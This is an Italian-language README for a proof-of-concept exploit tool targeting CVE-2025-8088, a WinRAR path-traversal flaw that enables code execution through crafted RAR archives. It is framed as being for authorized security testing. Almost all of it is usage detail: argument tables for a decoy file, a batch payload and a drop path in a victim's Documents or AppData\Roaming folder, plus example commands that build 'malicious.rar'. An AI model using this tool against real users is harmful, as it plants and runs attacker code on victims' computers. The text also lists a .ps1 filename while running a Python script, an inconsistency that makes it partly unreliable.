
Proof-of-concept exploit per CVE-2025-8088, una vulnerabilità di path traversal in WinRAR che consente l'esecuzione arbitraria di codice tramite archivi RAR appositamente creati. Include uno script Python con percorsi configurabili per decoy, payload e drop per test di sicurezza autorizzati.
Exploit_cve_2025_8088.ps1
python poc.py

| Argomento | Descrizione | Esempio |
|---|---|---|
--decoy | Percorso del file esca (verrà creato se non esiste) | resume.txt |
--payload | Percorso del file payload (verrà creato se non esiste) | payload.bat |
--drop | Percorso assoluto della directory di destinazione in cui verrà estratto il payload | C:\Users\Victim\Documents |
| Argomento | Descrizione | Valore Predefinito | Note |
|---|---|---|---|
--rar | Percorso di rar.exe | Rilevato automaticamente | Controlla le posizioni comuni e il PATH |
--out | Nome file RAR di output | poc-cve-2025-8088.rar | Archivio finale dannoso |
--workdir | Directory di lavoro per i file temporanei | Directory corrente (.) | |
--placeholder_len | Lunghezza del segnaposto ADS | max(len(target_path), 128) | Più lungo = traversal più affidabile |
--max_up | Numero di traversamenti delle directory padre (..\) | 16 | Minimo 8 consigliato |
--base_out | Nome file RAR base intermedio | <out>.base.rar | File temporaneo, eliminato dopo |
# Basic usage (auto-discover rar.exe)
python poc.py --decoy resume.txt --payload payload.bat --drop "C:\Users\Victim\Documents"
# Full custom configuration
python poc.py \
--decoy document.pdf \
--payload script.bat \
--drop "C:\Users\Victim\AppData\Roaming" \
--rar "C:\Program Files\WinRAR\rar.exe" \
--out malicious.rar \
--workdir ./build \
--placeholder_len 150 \
--max_up 20